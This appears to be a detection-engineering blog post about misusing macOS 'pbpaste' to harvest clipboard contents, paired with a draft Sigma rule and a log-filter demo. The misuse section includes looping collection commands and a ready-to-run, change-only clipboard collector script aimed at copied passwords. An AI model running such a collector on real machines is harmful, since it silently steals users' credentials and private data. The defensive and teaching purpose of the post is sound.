Living-off-the-Land: Exploring macOS LOOBins and Crafting Detection Rules - pbpaste
Exploring lesser known Living-off-the-Orchard Binaries and creating Sigma rules for detection
LOL Overview
For an overview of Living-off-the-Land/Living-off-the-Orchard, see my post here
For the previous write-up on ‘tmutil’, see the post here
pbpaste
The ‘pbpaste’ binary is used to paste the contents of the clipboard (also known as the pasteboard).
Normal Usage
macOS users can take whatever has been ‘copied’ (via right-click > Copy, cmd+c, or the output of a previous command piped into ‘pbcopy’) and write it to standard output with the ‘pbpaste’ binary; in practice it is used to paste the clipboard into a file or into another command.
Note: the companion ‘pbcopy’ binary does the reverse ‘copy’ operation, reading standard input and placing it on the pasteboard.
Misuse
As you can imagine, an attacker can use the ‘pbpaste’ binary to capture sensitive information that the user has copied: passwords, usernames, bank account numbers, and anything else that has passed through the clipboard.
One key point covered in this article is that password managers will “rely on the operating system’s clipboard to securely move credentials from the password vault to the web browser. It’s within these few seconds that an attacker can dump the clipboard contents and exfiltrate passwords.”
Also of note, no special privileges are required to use this binary: it needs neither root nor any entitlement, so anyone who can run commands in a user’s login session can read that user’s pasteboard.
Example Commands
Any Mac user can test this out. Simply copy any text, open a terminal, and enter:
pbpaste
In this example, I copied the previous line:
Paste Clipboard to a File
To demonstrate another simple example, this is how one could direct the contents of the clipboard to a file using ‘pbpaste’ -
pbpaste > contents.txt
In this case, anyone could open the “contents.txt” file and view the output from the clipboard.
Continuous Collection
In a similar manner, an attacker with access to the system could execute a continuous collection of the clipboard content by implementing ‘pbpaste’ within a loop.
This particular example appends the contents of the clipboard to the “contents.txt” file every 5 seconds (pbpaste is redirected straight to the file, since wrapping it in echo $(pbpaste) would collapse newlines and expand any glob characters in the copied text) -
while true; do pbpaste >> contents.txt; sleep 5; done
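The loop above writes the clipboard every interval whether or not it changed, so a long-lived collector fills the file with duplicates. The script below is an added example (mine, not code from the original post) of the same collection technique that records only when the pasteboard content changes, stamps each entry with the time, and keeps the clipboard read in its own function so the polling logic can be exercised without a real pasteboard. The file name, the interval, the CLIPWATCH_RUN switch and the script name clipwatch.sh are assumptions.

```shell
#!/bin/sh
# Added example: change-only clipboard collector built around pbpaste.
# Not from the original post. LOG_FILE, INTERVAL and CLIPWATCH_RUN are
# assumed names; override them in the environment as needed.
LOG_FILE="${LOG_FILE:-contents.txt}"
INTERVAL="${INTERVAL:-5}"

# Single point of contact with the pasteboard. Keeping it in a function
# lets the polling logic be tested with a fake clipboard.
read_clipboard() {
    pbpaste 2>/dev/null
}

# One polling step: compare the current clipboard with the previous value
# passed as $1, append a timestamped entry only if it changed and is
# non-empty, then print the current value so the caller can carry it
# forward. Note that $(...) strips trailing newlines from the clipboard.
collect_once() {
    prev="$1"
    cur="$(read_clipboard)"
    if [ "$cur" != "$prev" ] && [ -n "$cur" ]; then
        {
            printf '=== %s ===\n' "$(date '+%Y-%m-%dT%H:%M:%S')"
            printf '%s\n' "$cur"
        } >> "$LOG_FILE"
    fi
    printf '%s' "$cur"
}

# Poll forever, sleeping INTERVAL seconds between reads.
collect_loop() {
    prev=""
    while :; do
        prev="$(collect_once "$prev")"
        sleep "$INTERVAL"
    done
}

# Only start the endless loop when explicitly asked, so the file can also
# be sourced to reuse collect_once on its own.
if [ "${CLIPWATCH_RUN:-0}" = "1" ]; then
    collect_loop
fi
```

Run it with CLIPWATCH_RUN=1 sh clipwatch.sh (or source it and call collect_once yourself). From a defender’s point of view the interesting property is that this still spawns a fresh pbpaste process on every poll, so a process-creation rule sees one event per interval for as long as the collector runs.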
Detection Opportunities
There were previously no existing Sigma Rules to detect this behavior with the ‘pbpaste’ binary. To help out with this, I went ahead and crafted a simple Sigma Rule to contribute to the Master Repository. Note: My contribution is currently pending - I’ll update this post with the final link. Here is the draft detection rule:
title: Clipboard Data Collection Via Pbpaste
id: d8af0da1-2959-40f9-a3e4-37a6aa1228b7
status: experimental
description: Detects possible collection of data from the clipboard via execution of the pbpaste binary
references:
    - https://www.loobins.io/binaries/pbpaste/
    - https://medium.com/@NullByteWht/hacking-macos-how-to-dump-1password-keepassx-lastpass-passwords-in-plaintext-723c5b1c311b
author: Daniel Cortez
date: 2024/05/01
tags:
    - attack.collection
    - attack.t1115
    - attack.credential_access
logsource:
    product: macos
    category: process_creation
detection:
    selection:
        Image|endswith: '/pbpaste'
    condition: selection
falsepositives:
    - Legitimate administration activities
level: medium
This rule is looking for:
- Process Creation events
- on macOS
- where the executing image path ends in ‘/pbpaste’
Since it is possible that these activities could be carried out legitimately by a user or administrator (shell scripts and developer tooling call ‘pbpaste’ routinely), that is noted under the false positives section. Two limits are worth keeping in mind when tuning it: because the match is on the image path suffix, a copy of the binary placed at another path is still caught but a renamed copy is not; and an attacker can read the pasteboard through the NSPasteboard API from their own code without ever spawning ‘pbpaste’, so this rule covers the command-line path only.
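To see what the rule’s single selection actually matches, here is an added example (mine, not the post’s code and not a Sigma engine) that applies the same Image|endswith: '/pbpaste' logic over a handful of constructed process-creation events. The event format (one key=value record per line with the executable in an image= field) is an assumption for illustration; real telemetry from a macOS EDR or endpoint agent will look different, but the suffix match is the same.

```shell
#!/bin/sh
# Added example, not from the original post: the Sigma selection
#   Image|endswith: '/pbpaste'
# expressed as a filter over constructed process-creation events.

# Constructed sample events (not real telemetry). Expected outcome:
# lines 1 and 3 match (any path ending in /pbpaste), pbcopy, pbpastex
# and ls do not.
SAMPLE_EVENTS='ts=2024-05-01T09:00:01 image=/usr/bin/pbpaste parent=/bin/zsh user=alice
ts=2024-05-01T09:00:02 image=/usr/bin/pbcopy parent=/bin/zsh user=alice
ts=2024-05-01T09:00:03 image=/private/tmp/.x/pbpaste parent=/usr/bin/osascript user=alice
ts=2024-05-01T09:00:04 image=/usr/bin/pbpastex parent=/bin/zsh user=alice
ts=2024-05-01T09:00:05 image=/bin/ls parent=/bin/zsh user=alice'

# Read events on stdin, print those whose image= value ends in /pbpaste.
# The anchored regex is the endswith modifier; the leading slash keeps
# names that merely contain "pbpaste" (pbpastex, mypbpaste) from matching.
detect_pbpaste() {
    awk '
        {
            for (i = 1; i <= NF; i++) {
                if (substr($i, 1, 6) == "image=") {
                    img = substr($i, 7)
                    if (img ~ /\/pbpaste$/) { print; break }
                }
            }
        }'
}

# Number of sample events the selection fires on.
count_pbpaste_hits() {
    printf '%s\n' "$SAMPLE_EVENTS" | detect_pbpaste | wc -l | tr -d ' '
}

# Show the alerts the rule would raise on the sample set.
printf '%s\n' "$SAMPLE_EVENTS" | detect_pbpaste
```

The third sample line is the case that makes the suffix match worthwhile: a copy of the binary dropped under /private/tmp is still caught because the path still ends in /pbpaste, while the parent (osascript rather than an interactive shell) is the kind of context you would add to the rule to separate that from a developer’s alias.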